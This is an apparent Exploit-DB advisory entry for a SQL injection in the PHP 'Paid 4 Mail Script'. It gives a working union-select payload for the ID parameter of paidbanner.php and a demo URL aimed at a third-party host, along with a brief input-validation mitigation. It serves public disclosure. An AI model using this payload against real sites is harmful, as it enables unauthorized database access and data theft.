PHP Paid 4 Mail Script (ID) SQL Injection Vulnerability

vendor:

Paid 4 Mail Script

by:

ThE g0bL!N

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Paid 4 Mail Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP Paid 4 Mail Script (ID) SQL Injection Vulnerability

The vulnerability exists in the 'paidbanner.php' script, which allows an attacker to inject arbitrary SQL commands via the 'ID' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can be done by appending the SQL injection string to the vulnerable parameter in the HTTP request.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL statement.

Source

Exploit-DB raw data:

###########################################################################################
[+] PHP Paid 4 Mail Script (ID) SQL Injection Vulnerability
[+] Discovered By ThE g0bL!N
[+] http://www.h4ckf0ru.com & http://sec-art.com/cc/
############################################################################################
[+]Homepage : http://www.shop-020.de
[+] Exploit: /paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--
[+] Demo: http://www.city-demo.at/mail/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--
[+] Note : You can see the information like this "The requested URL /mail/[INFORMATION SQL] was not found on this server."
-------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-28]